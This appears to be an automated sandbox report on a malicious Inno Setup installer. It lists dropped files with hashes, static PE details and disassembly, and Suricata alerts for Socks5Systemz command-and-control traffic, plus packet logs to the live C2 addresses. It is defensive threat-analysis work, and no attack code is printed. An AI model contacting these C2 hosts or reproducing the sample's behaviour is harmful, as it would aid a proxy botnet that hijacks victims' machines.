SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-DSQM4.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	5.8975201046735535
Encrypted:	false
SSDEEP:	384:ED4NeA1PrXPBdHCNPJEQkWybd0oBSRnAZ806OSDrgtOFXqYUPYNQLJ/k+9tPEBer:64NHPfHCs6GNOpiM+RFjFyzcN23A
MD5:	3ADAA386B671C2DF3BAE5B39DC093008
SHA1:	067CF95FBDB922D81DB58432C46930F86D23DDED
SHA-256:	71CD2F5BC6E13B8349A7C98697C6D2E3FCDEEA92699CEDD591875BEA869FAE38
SHA-512:	BBE4187758D1A69F75A8CCA6B3184E0C20CF8701B16531B55ED4987497934B3C9EF66ECD5E6B83C7357F69734F1C8301B9F82F0A024BB693B732A2D5760FD303
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P.......................................................................P.......P..(............................p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-DSQM4.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.215994423157539
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
MD5:	4FF75F505FDDCC6A9AE62216446205D9
SHA1:	EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256:	A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512:	BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-DSQM4.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Download File

Process:	C:\Users\user\Desktop\wG1fFAzGfH.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	704000
Entropy (8bit):	6.4972640482038075
Encrypted:	false
SSDEEP:	12288:XRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExyc:BObekrkfohrP337uzHnA6cHiiHEVVg6X
MD5:	F448D7F4B76E5C9C3A4EAFF16A8B9B73
SHA1:	31808F1FFA84C954376975B7CDB0007E6B762488
SHA-256:	7233B85EB0F8B3AA5CAE3811D727AA8742FEC4D1091C120A0FE15006F424CC49
SHA-512:	F8197458CD2764C0B852DAC34F9BF361110A7DC86903024A97C7BCD3F77B148342BF45E3C2B60F6AF8198AE3B83938DBAAD5E007D71A0F88006F3A0618CF36F4
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.999426147790348
TrID:	Win32 Executable (generic) a (10002005/4) 98.86% Inno Setup installer (109748/4) 1.08% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	wG1fFAzGfH.exe
File size:	7'240'000 bytes
MD5:	439194c0af02fd82c5540a082543090f
SHA1:	4f113878dc99fa7e079a95bda31f3abc351fa8ef
SHA256:	abeee1f06b6b4634fcf4cc47b6ff341537f96e3adaf2b351b213321e26e07177
SHA512:	669e4dec07a69744261bb5c79243df72a0570b99033617a3f8a30001b399b8769fc112ab91135089380fef37f5c05fbf3d97ab5c9230d783831733cb3bf8743a
SSDEEP:	98304:++koiRLFdsODKUdFxQ8k618KzAYYC9z3Bbgtev25o40nsZJjNw5MQNiEU4P5EKHl:Dz25G6bV1yYDuZxCWQNhUU2uNzj
TLSH:	587633109166CC3FC4B3DDF1ACAB700611DD7C652D368BED982DDA4E17ABC72191C5A8
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x409c40
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x65765E5F [Mon Dec 11 00:57:03 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:	884310b1928934402ea6fec1dbd3cf5e

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFC4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-24h], eax
call 00007F9DCC7FA71Bh
call 00007F9DCC7FB922h
call 00007F9DCC7FBBB1h
call 00007F9DCC7FDBE8h
call 00007F9DCC7FDC2Fh
call 00007F9DCC80055Eh
call 00007F9DCC8006C5h
xor eax, eax
push ebp
push 0040A2FCh
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 0040A2C5h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0040C014h]
call 00007F9DCC80112Bh
call 00007F9DCC800D5Eh
lea edx, dword ptr [ebp-10h]
xor eax, eax
call 00007F9DCC7FE218h
mov edx, dword ptr [ebp-10h]
mov eax, 0040CDE8h
call 00007F9DCC7FA7C7h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0040CDE8h]
mov dl, 01h
mov eax, 0040738Ch
call 00007F9DCC7FEAA7h
mov dword ptr [0040CDECh], eax
xor edx, edx
push ebp
push 0040A27Dh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F9DCC80119Bh
mov dword ptr [0040CDF4h], eax
mov eax, dword ptr [0040CDF4h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F9DCC8012DAh
mov eax, dword ptr [0040CDF4h]
mov edx, 00000028h
call 00007F9DCC7FEEA8h
mov edx, dword ptr [000000F4h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd000	0x950	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x11000	0x2c00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xf000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x9364	0x9400	0d7ac17dafcd52a9b3ea353c32256c1d	False	0.6148648648648649	data	6.56223225792919	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0xb000	0x24c	0x400	45829356498700390b8c7afa10ea05a4	False	0.31640625	data	2.7585022150416294	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0xc000	0xe4c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xd000	0x950	0xa00	bb5485bf968b970e5ea81292af2acdba	False	0.414453125	data	4.430733069799036	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xe000	0x8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xf000	0x18	0x200	9ba824905bf9c7922b6fc87a38b74366	False	0.052734375	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x10000	0x8b4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x11000	0x2c00	0x2c00	f6c630e7cc236d28ebf716909ed9b50a	False	0.32262073863636365	data	4.461907293084106	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x11354	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	Dutch	Netherlands	0.5675675675675675
RT_ICON	0x1147c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	Dutch	Netherlands	0.4486994219653179
RT_ICON	0x119e4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	Dutch	Netherlands	0.4637096774193548
RT_ICON	0x11ccc	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	Dutch	Netherlands	0.3935018050541516
RT_STRING	0x12574	0x2f2	data			0.35543766578249336
RT_STRING	0x12868	0x30c	data			0.3871794871794872
RT_STRING	0x12b74	0x2ce	data			0.42618384401114207
RT_STRING	0x12e44	0x68	data			0.75
RT_STRING	0x12eac	0xb4	data			0.6277777777777778
RT_STRING	0x12f60	0xae	data			0.5344827586206896
RT_RCDATA	0x13010	0x2c	data			1.1818181818181819
RT_GROUP_ICON	0x1303c	0x3e	data	English	United States	0.8387096774193549
RT_VERSION	0x1307c	0x4b8	COM executable for DOS	English	United States	0.27483443708609273
RT_MANIFEST	0x13534	0x560	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4251453488372093

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll	MessageBoxA
oleaut32.dll	VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll	WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll	TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll	InitCommonControls
advapi32.dll	AdjustTokenPrivileges

Possible Origin

Language of compilation system	Country where language is spoken	Map
Dutch	Netherlands
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-14T13:23:16.646042+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	49849	94.232.249.187	80	TCP
2024-12-14T13:23:16.646042+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.6	49849	94.232.249.187	80	TCP
2024-12-14T13:23:29.803670+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	49880	94.232.249.187	80	TCP
2024-12-14T13:23:29.803670+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.6	49880	94.232.249.187	80	TCP
2024-12-14T13:23:42.941918+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	49912	94.232.249.187	80	TCP
2024-12-14T13:23:42.941918+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.6	49912	94.232.249.187	80	TCP
2024-12-14T13:23:49.600943+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	49944	185.237.206.129	80	TCP
2024-12-14T13:23:49.600943+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.6	49944	185.237.206.129	80	TCP
2024-12-14T13:23:51.108071+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	49948	185.237.206.129	80	TCP
2024-12-14T13:23:51.108071+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.6	49948	185.237.206.129	80	TCP
2024-12-14T13:23:54.940125+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	49948	185.237.206.129	80	TCP
2024-12-14T13:23:54.940125+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.6	49948	185.237.206.129	80	TCP
2024-12-14T13:23:56.445209+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	49962	185.237.206.129	80	TCP
2024-12-14T13:23:56.445209+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.6	49962	185.237.206.129	80	TCP
2024-12-14T13:23:58.088059+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	49969	185.237.206.129	80	TCP
2024-12-14T13:23:58.088059+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.6	49969	185.237.206.129	80	TCP
2024-12-14T13:23:59.586921+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	49972	185.237.206.129	80	TCP
2024-12-14T13:23:59.586921+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.6	49972	185.237.206.129	80	TCP
2024-12-14T13:24:01.092535+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	49976	185.237.206.129	80	TCP
2024-12-14T13:24:01.092535+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.6	49976	185.237.206.129	80	TCP
2024-12-14T13:24:02.607207+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	49981	185.237.206.129	80	TCP
2024-12-14T13:24:02.607207+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.6	49981	185.237.206.129	80	TCP
2024-12-14T13:24:04.131362+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	49984	185.237.206.129	80	TCP
2024-12-14T13:24:04.131362+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.6	49984	185.237.206.129	80	TCP
2024-12-14T13:24:05.637264+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.6	49989	185.237.206.129	80	TCP
2024-12-14T13:24:05.637264+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.6	49989	185.237.206.129	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 14, 2024 13:23:08.513856888 CET	49849	80	192.168.2.6	94.232.249.187
Dec 14, 2024 13:23:08.635176897 CET	80	49849	94.232.249.187	192.168.2.6
Dec 14, 2024 13:23:08.638292074 CET	49849	80	192.168.2.6	94.232.249.187
Dec 14, 2024 13:23:08.638951063 CET	49849	80	192.168.2.6	94.232.249.187
Dec 14, 2024 13:23:08.758785963 CET	80	49849	94.232.249.187	192.168.2.6
Dec 14, 2024 13:23:16.646042109 CET	49849	80	192.168.2.6	94.232.249.187
Dec 14, 2024 13:23:21.661406040 CET	49880	80	192.168.2.6	94.232.249.187
Dec 14, 2024 13:23:21.782174110 CET	80	49880	94.232.249.187	192.168.2.6
Dec 14, 2024 13:23:21.783037901 CET	49880	80	192.168.2.6	94.232.249.187
Dec 14, 2024 13:23:21.783200979 CET	49880	80	192.168.2.6	94.232.249.187
Dec 14, 2024 13:23:21.903381109 CET	80	49880	94.232.249.187	192.168.2.6
Dec 14, 2024 13:23:29.803669930 CET	49880	80	192.168.2.6	94.232.249.187
Dec 14, 2024 13:23:34.817950010 CET	49912	80	192.168.2.6	94.232.249.187
Dec 14, 2024 13:23:34.937829018 CET	80	49912	94.232.249.187	192.168.2.6
Dec 14, 2024 13:23:34.938150883 CET	49912	80	192.168.2.6	94.232.249.187
Dec 14, 2024 13:23:34.938270092 CET	49912	80	192.168.2.6	94.232.249.187
Dec 14, 2024 13:23:35.058300972 CET	80	49912	94.232.249.187	192.168.2.6
Dec 14, 2024 13:23:42.941917896 CET	49912	80	192.168.2.6	94.232.249.187
Dec 14, 2024 13:23:48.209336042 CET	49944	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:48.329142094 CET	80	49944	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:48.329247952 CET	49944	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:48.329365015 CET	49944	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:48.449080944 CET	80	49944	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:49.600816965 CET	80	49944	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:49.600943089 CET	49944	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:49.707627058 CET	49944	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:49.708012104 CET	49948	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:49.827764034 CET	80	49944	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:49.827826977 CET	80	49948	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:49.827966928 CET	49948	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:49.828087091 CET	49944	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:49.828118086 CET	49948	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:49.947882891 CET	80	49948	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:51.107959986 CET	80	49948	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:51.108071089 CET	49948	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:51.108532906 CET	49952	2023	192.168.2.6	89.105.201.183
Dec 14, 2024 13:23:51.228332043 CET	2023	49952	89.105.201.183	192.168.2.6
Dec 14, 2024 13:23:51.228406906 CET	49952	2023	192.168.2.6	89.105.201.183
Dec 14, 2024 13:23:51.228550911 CET	49952	2023	192.168.2.6	89.105.201.183
Dec 14, 2024 13:23:51.348217010 CET	2023	49952	89.105.201.183	192.168.2.6
Dec 14, 2024 13:23:51.348390102 CET	49952	2023	192.168.2.6	89.105.201.183
Dec 14, 2024 13:23:51.468058109 CET	2023	49952	89.105.201.183	192.168.2.6
Dec 14, 2024 13:23:52.467365026 CET	2023	49952	89.105.201.183	192.168.2.6
Dec 14, 2024 13:23:52.519793987 CET	49952	2023	192.168.2.6	89.105.201.183
Dec 14, 2024 13:23:54.473417044 CET	49948	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:54.593154907 CET	80	49948	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:54.940037012 CET	80	49948	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:54.940124989 CET	49948	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:55.052048922 CET	49948	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:55.052381992 CET	49962	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:55.172107935 CET	80	49962	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:55.172204018 CET	80	49948	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:55.172316074 CET	49948	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:55.172333002 CET	49962	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:55.172550917 CET	49962	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:55.292368889 CET	80	49962	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:56.445116997 CET	80	49962	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:56.445209026 CET	49962	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:56.445724964 CET	49967	2023	192.168.2.6	89.105.201.183
Dec 14, 2024 13:23:56.565601110 CET	2023	49967	89.105.201.183	192.168.2.6
Dec 14, 2024 13:23:56.565691948 CET	49967	2023	192.168.2.6	89.105.201.183
Dec 14, 2024 13:23:56.565798998 CET	49967	2023	192.168.2.6	89.105.201.183
Dec 14, 2024 13:23:56.565824032 CET	49967	2023	192.168.2.6	89.105.201.183
Dec 14, 2024 13:23:56.676426888 CET	49962	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:56.676675081 CET	49969	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:56.685781002 CET	2023	49967	89.105.201.183	192.168.2.6
Dec 14, 2024 13:23:56.726682901 CET	2023	49967	89.105.201.183	192.168.2.6
Dec 14, 2024 13:23:56.797332048 CET	80	49962	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:56.797365904 CET	80	49969	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:56.797478914 CET	49962	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:56.797478914 CET	49969	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:56.797583103 CET	49969	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:56.917875051 CET	80	49969	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:57.532973051 CET	2023	49967	89.105.201.183	192.168.2.6
Dec 14, 2024 13:23:57.533058882 CET	49967	2023	192.168.2.6	89.105.201.183
Dec 14, 2024 13:23:58.087806940 CET	80	49969	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:58.088058949 CET	49969	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:58.192138910 CET	49969	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:58.192452908 CET	49972	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:58.312414885 CET	80	49972	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:58.312454939 CET	80	49969	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:58.312661886 CET	49969	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:58.312666893 CET	49972	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:58.312782049 CET	49972	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:58.432944059 CET	80	49972	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:59.586838007 CET	80	49972	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:59.586920977 CET	49972	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:59.697402954 CET	49972	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:59.697724104 CET	49976	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:59.817663908 CET	80	49976	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:59.817703009 CET	80	49972	185.237.206.129	192.168.2.6
Dec 14, 2024 13:23:59.817900896 CET	49976	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:59.817929983 CET	49972	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:59.818037033 CET	49976	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:23:59.937911034 CET	80	49976	185.237.206.129	192.168.2.6
Dec 14, 2024 13:24:01.092442989 CET	80	49976	185.237.206.129	192.168.2.6
Dec 14, 2024 13:24:01.092535019 CET	49976	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:01.209604025 CET	49976	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:01.209933996 CET	49981	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:01.329961061 CET	80	49981	185.237.206.129	192.168.2.6
Dec 14, 2024 13:24:01.330039978 CET	49981	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:01.330060005 CET	80	49976	185.237.206.129	192.168.2.6
Dec 14, 2024 13:24:01.330149889 CET	49976	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:01.330245972 CET	49981	80	192.168.2.6	185.237.206.129
Dec 14, 2024 13:24:01.451229095 CET	80	49981	185.237.206.129	192.168.2.6
Dec 14, 2024 13:24:02.605206966 CET	80	49981	185.237.206.129	192.168.2.6
